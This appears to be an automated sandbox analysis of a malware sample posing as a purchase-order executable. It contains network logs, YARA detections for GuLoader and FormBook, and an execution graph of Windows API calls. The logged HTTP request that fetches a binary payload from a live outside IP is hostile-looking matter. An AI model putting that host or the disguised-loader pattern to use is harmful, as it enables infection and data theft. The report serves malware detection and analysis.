                                          Nov 18, 2024 18:19:36.715475082 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715476036 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715481043 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715498924 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715513945 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715523958 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715526104 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.715533018 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715543032 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715543985 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.715553999 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715563059 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715575933 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715590000 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715622902 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.715682030 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.716233015 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.716444969 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716445923 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716453075 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716461897 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716474056 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716485023 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716494083 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716496944 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.716515064 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.716515064 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716526985 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.716531038 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716542006 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716552019 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.716556072 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716557980 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716563940 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716567993 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.716573000 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716582060 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716592073 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716597080 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.716602087 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716618061 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.716638088 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.717456102 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.717490911 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.717525005 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.717545033 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.717566013 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.717572927 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.717606068 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.717639923 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.717650890 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.717680931 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.717686892 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.717720985 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.717727900 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.717761040 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.717772961 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.717807055 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.717840910 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.717852116 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.717875004 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.717880964 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.717909098 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.717920065 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.717943907 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.717947960 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.717995882 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.757222891 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.757324934 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.757400990 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.757435083 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.757458925 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.757469893 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.757505894 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.757541895 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.757541895 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.757563114 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.757570028 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.757653952 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.757725000 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.757729053 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.757777929 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.757802010 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.757836103 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.757855892 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.757894039 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.764286995 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.764354944 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.764388084 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.764455080 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.764497042 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.804490089 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.804522038 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.804541111 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.804593086 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.804744005 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.804857969 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:20:43.098263979 CET5320080192.168.2.7185.222.57.90
                                          Timestamp                            Source Port  Dest Port  Source IP     Dest IP
                                          Nov 18, 2024 18:19:07.841828108 CET  53           50880      162.159.36.2  192.168.2.7
                                          Nov 18, 2024 18:19:08.539938927 CET  53           50680      1.1.1.1       192.168.2.7
                                          • 185.222.57.90
                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          0           192.168.2.7  53200        185.222.57.90   80                7800  C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe

                                          Timestamp                            Bytes transferred  Direction  Data
                                          Nov 18, 2024 18:19:34.261518955 CET  175                OUT        GET /zFSrvbrRquo53.bin HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                          Host: 185.222.57.90
                                          Cache-Control: no-cache
                                          Nov 18, 2024 18:19:35.133896112 CET  1236               IN         HTTP/1.1 200 OK
                                          Content-Type: application/octet-stream
                                          Last-Modified: Sun, 17 Nov 2024 17:32:38 GMT
                                          Accept-Ranges: bytes
                                          ETag: "2aaa7eb21639db1:0"
                                          Server: Microsoft-IIS/10.0
                                          Date: Mon, 18 Nov 2024 17:19:34 GMT
                                          Content-Length: 290368

                                          Target ID:5
                                          Start time:12:18:20
                                          Start date:18/11/2024
                                          Path:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"
                                          Imagebase:0x400000
                                          File size:724'333 bytes
                                          MD5 hash:B9A03FB0C2C7F23A1E4CCB0D79C5053C
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1914988033.0000000003FC1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          Target ID:11
                                          Start time:13:57:01
                                          Start date:18/11/2024
                                          Path:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"
                                          Imagebase:0x400000
                                          File size:724'333 bytes
                                          MD5 hash:B9A03FB0C2C7F23A1E4CCB0D79C5053C
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2689733923.0000000034480000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                            Execution Graph

                                            Execution Coverage:21.5%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:20.8%
                                            Total number of Nodes:1528
                                            Total number of Limit Nodes:43
4084 40586e CreateDirectoryW 4068->4084 4070->4068 4087 406694 GetModuleHandleA 4072->4087 4076 405842 GetLastError 4075->4076 4077 40583e 4075->4077 4076->4077 4078 405851 SetFileSecurityW 4076->4078 4077->4068 4078->4077 4079 405867 GetLastError 4078->4079 4079->4077 4081 405322 24 API calls 4080->4081 4082 401431 4081->4082 4083 4062ba lstrcpynW 4082->4083 4083->4067 4085 405882 GetLastError 4084->4085 4086 40587e 4084->4086 4085->4086 4086->4068 4088 4066b0 4087->4088 4089 4066ba GetProcAddress 4087->4089 4093 406624 GetSystemDirectoryW 4088->4093 4092 405892 4089->4092 4091 4066b6 4091->4089 4091->4092 4092->4068 4094 406646 wsprintfW LoadLibraryExW 4093->4094 4094->4091 4210 401e49 4211 402c1f 17 API calls 4210->4211 4212 401e4f 4211->4212 4213 402c1f 17 API calls 4212->4213 4214 401e5b 4213->4214 4215 401e72 EnableWindow 4214->4215 4216 401e67 ShowWindow 4214->4216 4217 402ac5 4215->4217 4216->4217 4218 40264a 4219 402c1f 17 API calls 4218->4219 4220 402659 4219->4220 4221 4026a3 ReadFile 4220->4221 4222 405e33 ReadFile 4220->4222 4223 4026e3 MultiByteToWideChar 4220->4223 4224 402798 4220->4224 4227 40273c 4220->4227 4228 402709 SetFilePointer MultiByteToWideChar 4220->4228 4229 4027a9 4220->4229 4231 402796 4220->4231 4221->4220 4221->4231 4222->4220 4223->4220 4241 406201 wsprintfW 4224->4241 4227->4220 4227->4231 4232 405e91 SetFilePointer 4227->4232 4228->4220 4230 4027ca SetFilePointer 4229->4230 4229->4231 4230->4231 4233 405ead 4232->4233 4240 405ec5 4232->4240 4234 405e33 ReadFile 4233->4234 4235 405eb9 4234->4235 4236 405ef6 SetFilePointer 4235->4236 4237 405ece SetFilePointer 4235->4237 4235->4240 4236->4240 4237->4236 4238 405ed9 4237->4238 4239 405e62 WriteFile 4238->4239 4239->4240 4240->4227 4241->4231 4965 4016cc 4966 402c41 17 API calls 4965->4966 4967 4016d2 GetFullPathNameW 4966->4967 4968 4016ec 4967->4968 4974 40170e 4967->4974 4970 4065fd 2 API calls 4968->4970 4968->4974 4969 401723 GetShortPathNameW 4972 402ac5 4969->4972 4971 4016fe 
4970->4971 4971->4974 4975 4062ba lstrcpynW 4971->4975 4974->4969 4974->4972 4975->4974 4252 40234e 4253 402c41 17 API calls 4252->4253 4254 40235d 4253->4254 4255 402c41 17 API calls 4254->4255 4256 402366 4255->4256 4257 402c41 17 API calls 4256->4257 4258 402370 GetPrivateProfileStringW 4257->4258 4976 73cf18dd 4977 73cf1900 4976->4977 4978 73cf1935 GlobalFree 4977->4978 4979 73cf1947 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 4977->4979 4978->4979 4980 73cf1272 2 API calls 4979->4980 4981 73cf1ad2 GlobalFree GlobalFree 4980->4981 4982 401b53 4983 402c41 17 API calls 4982->4983 4984 401b5a 4983->4984 4985 402c1f 17 API calls 4984->4985 4986 401b63 wsprintfW 4985->4986 4987 402ac5 4986->4987 4988 401956 4989 402c41 17 API calls 4988->4989 4990 40195d lstrlenW 4989->4990 4991 402592 4990->4991 4992 4014d7 4993 402c1f 17 API calls 4992->4993 4994 4014dd Sleep 4993->4994 4996 402ac5 4994->4996 4997 73cf16d8 4998 73cf1707 4997->4998 4999 73cf1b63 22 API calls 4998->4999 5000 73cf170e 4999->5000 5001 73cf1715 5000->5001 5002 73cf1721 5000->5002 5003 73cf1272 2 API calls 5001->5003 5004 73cf172b 5002->5004 5005 73cf1748 5002->5005 5008 73cf171f 5003->5008 5009 73cf153d 3 API calls 5004->5009 5006 73cf174e 5005->5006 5007 73cf1772 5005->5007 5012 73cf1272 2 API calls 5006->5012 5010 73cf153d 3 API calls 5007->5010 5011 73cf1730 5009->5011 5010->5008 5014 73cf1272 2 API calls 5011->5014 5013 73cf1759 GlobalFree 5012->5013 5013->5008 5016 73cf176d GlobalFree 5013->5016 5015 73cf173c GlobalFree 5014->5015 5015->5008 5016->5008 5017 73cf1058 5019 73cf1074 5017->5019 5018 73cf10dd 5019->5018 5020 73cf1092 5019->5020 5030 73cf1516 5019->5030 5022 73cf1516 GlobalFree 5020->5022 5023 73cf10a2 5022->5023 5024 73cf10a9 GlobalSize 5023->5024 5025 73cf10b2 5023->5025 5024->5025 5026 73cf10c7 5025->5026 5027 73cf10b6 GlobalAlloc 5025->5027 5029 73cf10d2 GlobalFree 5026->5029 5028 73cf153d 3 API calls 5027->5028 5028->5026 5029->5018 5032 73cf151c 5030->5032 5031 73cf1522 
5031->5020 5032->5031 5033 73cf152e GlobalFree 5032->5033 5033->5020 4785 403d58 4786 403d70 4785->4786 4787 403eab 4785->4787 4786->4787 4790 403d7c 4786->4790 4788 403efc 4787->4788 4789 403ebc GetDlgItem GetDlgItem 4787->4789 4792 403f56 4788->4792 4802 401389 2 API calls 4788->4802 4791 404231 18 API calls 4789->4791 4793 403d87 SetWindowPos 4790->4793 4794 403d9a 4790->4794 4797 403ee6 SetClassLongW 4791->4797 4798 40427d SendMessageW 4792->4798 4817 403ea6 4792->4817 4793->4794 4795 403db7 4794->4795 4796 403d9f ShowWindow 4794->4796 4799 403dd9 4795->4799 4800 403dbf DestroyWindow 4795->4800 4796->4795 4801 40140b 2 API calls 4797->4801 4826 403f68 4798->4826 4804 403dde SetWindowLongW 4799->4804 4805 403def 4799->4805 4803 4041db 4800->4803 4801->4788 4806 403f2e 4802->4806 4812 4041eb ShowWindow 4803->4812 4803->4817 4804->4817 4809 403e98 4805->4809 4810 403dfb GetDlgItem 4805->4810 4806->4792 4811 403f32 SendMessageW 4806->4811 4807 40140b 2 API calls 4807->4826 4808 4041bc DestroyWindow EndDialog 4808->4803 4866 404298 4809->4866 4813 403e2b 4810->4813 4814 403e0e SendMessageW IsWindowEnabled 4810->4814 4811->4817 4812->4817 4818 403e38 4813->4818 4821 403e7f SendMessageW 4813->4821 4822 403e4b 4813->4822 4829 403e30 4813->4829 4814->4813 4814->4817 4816 4062dc 17 API calls 4816->4826 4818->4821 4818->4829 4820 404231 18 API calls 4820->4826 4821->4809 4823 403e53 4822->4823 4824 403e68 4822->4824 4827 40140b 2 API calls 4823->4827 4828 40140b 2 API calls 4824->4828 4825 403e66 4825->4809 4826->4807 4826->4808 4826->4816 4826->4817 4826->4820 4847 4040fc DestroyWindow 4826->4847 4857 404231 4826->4857 4827->4829 4830 403e6f 4828->4830 4863 40420a 4829->4863 4830->4809 4830->4829 4832 403fe3 GetDlgItem 4833 404000 ShowWindow KiUserCallbackDispatcher 4832->4833 4834 403ff8 4832->4834 4860 404253 EnableWindow 4833->4860 4834->4833 4836 40402a EnableWindow 4841 40403e 4836->4841 4837 404043 GetSystemMenu EnableMenuItem SendMessageW 4838 404073 SendMessageW 
4837->4838 4837->4841 4838->4841 4840 403d39 18 API calls 4840->4841 4841->4837 4841->4840 4861 404266 SendMessageW 4841->4861 4862 4062ba lstrcpynW 4841->4862 4843 4040a2 lstrlenW 4844 4062dc 17 API calls 4843->4844 4845 4040b8 SetWindowTextW 4844->4845 4846 401389 2 API calls 4845->4846 4846->4826 4847->4803 4848 404116 CreateDialogParamW 4847->4848 4848->4803 4849 404149 4848->4849 4850 404231 18 API calls 4849->4850 4851 404154 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4850->4851 4852 401389 2 API calls 4851->4852 4853 40419a 4852->4853 4853->4817 4854 4041a2 ShowWindow 4853->4854 4855 40427d SendMessageW 4854->4855 4856 4041ba 4855->4856 4856->4803 4858 4062dc 17 API calls 4857->4858 4859 40423c SetDlgItemTextW 4858->4859 4859->4832 4860->4836 4861->4841 4862->4843 4864 404211 4863->4864 4865 404217 SendMessageW 4863->4865 4864->4865 4865->4825 4867 40435b 4866->4867 4868 4042b0 GetWindowLongW 4866->4868 4867->4817 4868->4867 4869 4042c5 4868->4869 4869->4867 4870 4042f2 GetSysColor 4869->4870 4871 4042f5 4869->4871 4870->4871 4872 404305 SetBkMode 4871->4872 4873 4042fb SetTextColor 4871->4873 4874 404323 4872->4874 4875 40431d GetSysColor 4872->4875 4873->4872 4876 404334 4874->4876 4877 40432a SetBkColor 4874->4877 4875->4874 4876->4867 4878 404347 DeleteObject 4876->4878 4879 40434e CreateBrushIndirect 4876->4879 4877->4876 4878->4879 4879->4867 5034 401f58 5035 402c41 17 API calls 5034->5035 5036 401f5f 5035->5036 5037 4065fd 2 API calls 5036->5037 5038 401f65 5037->5038 5040 401f76 5038->5040 5041 406201 wsprintfW 5038->5041 5041->5040 5042 402259 5043 402c41 17 API calls 5042->5043 5044 40225f 5043->5044 5045 402c41 17 API calls 5044->5045 5046 402268 5045->5046 5047 402c41 17 API calls 5046->5047 5048 402271 5047->5048 5049 4065fd 2 API calls 5048->5049 5050 40227a 5049->5050 5051 40228b lstrlenW lstrlenW 5050->5051 5052 40227e 5050->5052 5053 405322 24 API calls 5051->5053 5054 405322 24 API calls 5052->5054 5055 4022c9 SHFileOperationW 
5053->5055 5056 402286 5054->5056 5055->5052 5055->5056 5057 4046db 5058 404711 5057->5058 5059 4046eb 5057->5059 5061 404298 8 API calls 5058->5061 5060 404231 18 API calls 5059->5060 5062 4046f8 SetDlgItemTextW 5060->5062 5063 40471d 5061->5063 5062->5058 4883 40175c 4884 402c41 17 API calls 4883->4884 4885 401763 4884->4885 4886 405ddf 2 API calls 4885->4886 4887 40176a 4886->4887 4888 405ddf 2 API calls 4887->4888 4888->4887 5064 4022dd 5065 4022e4 5064->5065 5068 4022f7 5064->5068 5066 4062dc 17 API calls 5065->5066 5067 4022f1 5066->5067 5069 405920 MessageBoxIndirectW 5067->5069 5069->5068 5070 4028dd 5092 405db0 GetFileAttributesW CreateFileW 5070->5092 5072 4028e4 5073 4028f0 GlobalAlloc 5072->5073 5074 402987 5072->5074 5075 402909 5073->5075 5076 40297e CloseHandle 5073->5076 5077 4029a2 5074->5077 5078 40298f DeleteFileW 5074->5078 5093 403347 SetFilePointer 5075->5093 5076->5074 5078->5077 5080 40290f 5081 403331 ReadFile 5080->5081 5082 402918 GlobalAlloc 5081->5082 5083 402928 5082->5083 5084 40295c 5082->5084 5085 403116 31 API calls 5083->5085 5086 405e62 WriteFile 5084->5086 5091 402935 5085->5091 5087 402968 GlobalFree 5086->5087 5088 403116 31 API calls 5087->5088 5090 40297b 5088->5090 5089 402953 GlobalFree 5089->5084 5090->5076 5091->5089 5092->5072 5093->5080 5094 401d5d GetDlgItem GetClientRect 5095 402c41 17 API calls 5094->5095 5096 401d8f LoadImageW SendMessageW 5095->5096 5097 401dad DeleteObject 5096->5097 5098 402ac5 5096->5098 5097->5098 5099 405461 5100 405482 GetDlgItem GetDlgItem GetDlgItem 5099->5100 5101 40560b 5099->5101 5144 404266 SendMessageW 5100->5144 5103 405614 GetDlgItem CreateThread CloseHandle 5101->5103 5104 40563c 5101->5104 5103->5104 5106 405667 5104->5106 5107 405653 ShowWindow ShowWindow 5104->5107 5108 40568c 5104->5108 5105 4054f2 5113 4054f9 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5105->5113 5110 4056a1 ShowWindow 5106->5110 5111 40567b 5106->5111 5114 4056c7 5106->5114 5146 404266 
SendMessageW 5107->5146 5112 404298 8 API calls 5108->5112 5117 4056c1 5110->5117 5118 4056b3 5110->5118 5115 40420a SendMessageW 5111->5115 5116 40569a 5112->5116 5119 405567 5113->5119 5120 40554b SendMessageW SendMessageW 5113->5120 5114->5108 5121 4056d5 SendMessageW 5114->5121 5115->5108 5126 40420a SendMessageW 5117->5126 5125 405322 24 API calls 5118->5125 5122 40557a 5119->5122 5123 40556c SendMessageW 5119->5123 5120->5119 5121->5116 5124 4056ee CreatePopupMenu 5121->5124 5128 404231 18 API calls 5122->5128 5123->5122 5127 4062dc 17 API calls 5124->5127 5125->5117 5126->5114 5129 4056fe AppendMenuW 5127->5129 5130 40558a 5128->5130 5131 40571b GetWindowRect 5129->5131 5132 40572e TrackPopupMenu 5129->5132 5133 405593 ShowWindow 5130->5133 5134 4055c7 GetDlgItem SendMessageW 5130->5134 5131->5132 5132->5116 5135 405749 5132->5135 5136 4055b6 5133->5136 5137 4055a9 ShowWindow 5133->5137 5134->5116 5138 4055ee SendMessageW SendMessageW 5134->5138 5139 405765 SendMessageW 5135->5139 5145 404266 SendMessageW 5136->5145 5137->5136 5138->5116 5139->5139 5140 405782 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5139->5140 5142 4057a7 SendMessageW 5140->5142 5142->5142 5143 4057d0 GlobalUnlock SetClipboardData CloseClipboard 5142->5143 5143->5116 5144->5105 5145->5134 5146->5106 5147 401563 5148 402a6b 5147->5148 5151 406201 wsprintfW 5148->5151 5150 402a70 5151->5150 4096 4023e4 4097 402c41 17 API calls 4096->4097 4098 4023f6 4097->4098 4099 402c41 17 API calls 4098->4099 4100 402400 4099->4100 4113 402cd1 4100->4113 4103 40288b 4104 402438 4106 402444 4104->4106 4117 402c1f 4104->4117 4105 402c41 17 API calls 4107 40242e lstrlenW 4105->4107 4109 402463 RegSetValueExW 4106->4109 4120 403116 4106->4120 4107->4104 4111 402479 RegCloseKey 4109->4111 4111->4103 4114 402cec 4113->4114 4140 406155 4114->4140 4118 4062dc 17 API calls 4117->4118 4119 402c34 4118->4119 4119->4106 4121 40312f 4120->4121 4122 40315d 4121->4122 4147 403347 SetFilePointer 4121->4147 4144 
403331 4122->4144 4126 4032ca 4129 40330c 4126->4129 4132 4032ce 4126->4132 4127 40317a GetTickCount 4128 4032b4 4127->4128 4136 4031c9 4127->4136 4128->4109 4131 403331 ReadFile 4129->4131 4130 403331 ReadFile 4130->4136 4131->4128 4132->4128 4133 403331 ReadFile 4132->4133 4134 405e62 WriteFile 4132->4134 4133->4132 4134->4132 4135 40321f GetTickCount 4135->4136 4136->4128 4136->4130 4136->4135 4137 403244 MulDiv wsprintfW 4136->4137 4139 405e62 WriteFile 4136->4139 4138 405322 24 API calls 4137->4138 4138->4136 4139->4136 4141 406164 4140->4141 4142 402410 4141->4142 4143 40616f RegCreateKeyExW 4141->4143 4142->4103 4142->4104 4142->4105 4143->4142 4145 405e33 ReadFile 4144->4145 4146 403168 4145->4146 4146->4126 4146->4127 4146->4128 4147->4122 4181 4058e6 ShellExecuteExW 5152 404367 lstrcpynW lstrlenW 5153 402868 5154 402c41 17 API calls 5153->5154 5155 40286f FindFirstFileW 5154->5155 5156 402882 5155->5156 5157 402897 5155->5157 5161 406201 wsprintfW 5157->5161 5159 4028a0 5162 4062ba lstrcpynW 5159->5162 5161->5159 5162->5156 5163 401968 5164 402c1f 17 API calls 5163->5164 5165 40196f 5164->5165 5166 402c1f 17 API calls 5165->5166 5167 40197c 5166->5167 5168 402c41 17 API calls 5167->5168 5169 401993 lstrlenW 5168->5169 5170 4019a4 5169->5170 5171 4019e5 5170->5171 5175 4062ba lstrcpynW 5170->5175 5173 4019d5 5173->5171 5174 4019da lstrlenW 5173->5174 5174->5171 5175->5173 5176 403968 5177 403973 5176->5177 5178 403977 5177->5178 5179 40397a GlobalAlloc 5177->5179 5179->5178 5180 40166a 5181 402c41 17 API calls 5180->5181 5182 401670 5181->5182 5183 4065fd 2 API calls 5182->5183 5184 401676 5183->5184 5185 73cf10e1 5186 73cf1111 5185->5186 5187 73cf11d8 GlobalFree 5186->5187 5188 73cf12ba 2 API calls 5186->5188 5189 73cf11d3 5186->5189 5190 73cf11f8 GlobalFree 5186->5190 5191 73cf1272 2 API calls 5186->5191 5192 73cf1164 GlobalAlloc 5186->5192 5193 73cf12e1 lstrcpyW 5186->5193 5194 73cf11c4 GlobalFree 5186->5194 5188->5186 5189->5187 5190->5186 5191->5194 
5192->5186 5193->5186 5194->5186 4259 4027ef 4260 4027f6 4259->4260 4263 402a70 4259->4263 4261 402c1f 17 API calls 4260->4261 4262 4027fd 4261->4262 4264 40280c SetFilePointer 4262->4264 4264->4263 4265 40281c 4264->4265 4267 406201 wsprintfW 4265->4267 4267->4263 4268 40176f 4269 402c41 17 API calls 4268->4269 4270 401776 4269->4270 4271 401796 4270->4271 4272 40179e 4270->4272 4308 4062ba lstrcpynW 4271->4308 4309 4062ba lstrcpynW 4272->4309 4275 40179c 4279 40654e 5 API calls 4275->4279 4276 4017a9 4277 405b8f 3 API calls 4276->4277 4278 4017af lstrcatW 4277->4278 4278->4275 4284 4017bb 4279->4284 4280 4065fd 2 API calls 4280->4284 4281 4017f7 4282 405d8b 2 API calls 4281->4282 4282->4284 4284->4280 4284->4281 4285 4017cd CompareFileTime 4284->4285 4286 40188d 4284->4286 4293 4062dc 17 API calls 4284->4293 4298 4062ba lstrcpynW 4284->4298 4304 401864 4284->4304 4307 405db0 GetFileAttributesW CreateFileW 4284->4307 4310 405920 4284->4310 4285->4284 4287 405322 24 API calls 4286->4287 4289 401897 4287->4289 4288 405322 24 API calls 4306 401879 4288->4306 4290 403116 31 API calls 4289->4290 4291 4018aa 4290->4291 4292 4018be SetFileTime 4291->4292 4294 4018d0 CloseHandle 4291->4294 4292->4294 4293->4284 4295 4018e1 4294->4295 4294->4306 4296 4018e6 4295->4296 4297 4018f9 4295->4297 4299 4062dc 17 API calls 4296->4299 4300 4062dc 17 API calls 4297->4300 4298->4284 4301 4018ee lstrcatW 4299->4301 4302 401901 4300->4302 4301->4302 4305 405920 MessageBoxIndirectW 4302->4305 4304->4288 4304->4306 4305->4306 4307->4284 4308->4275 4309->4276 4311 405935 4310->4311 4312 405981 4311->4312 4313 405949 MessageBoxIndirectW 4311->4313 4312->4284 4313->4312 5195 4043f0 5196 404408 5195->5196 5200 404522 5195->5200 5201 404231 18 API calls 5196->5201 5197 40458c 5198 404656 5197->5198 5199 404596 GetDlgItem 5197->5199 5205 404298 8 API calls 5198->5205 5202 404617 5199->5202 5206 4045b0 5199->5206 5200->5197 5200->5198 5203 40455d GetDlgItem SendMessageW 5200->5203 5204 40446f 
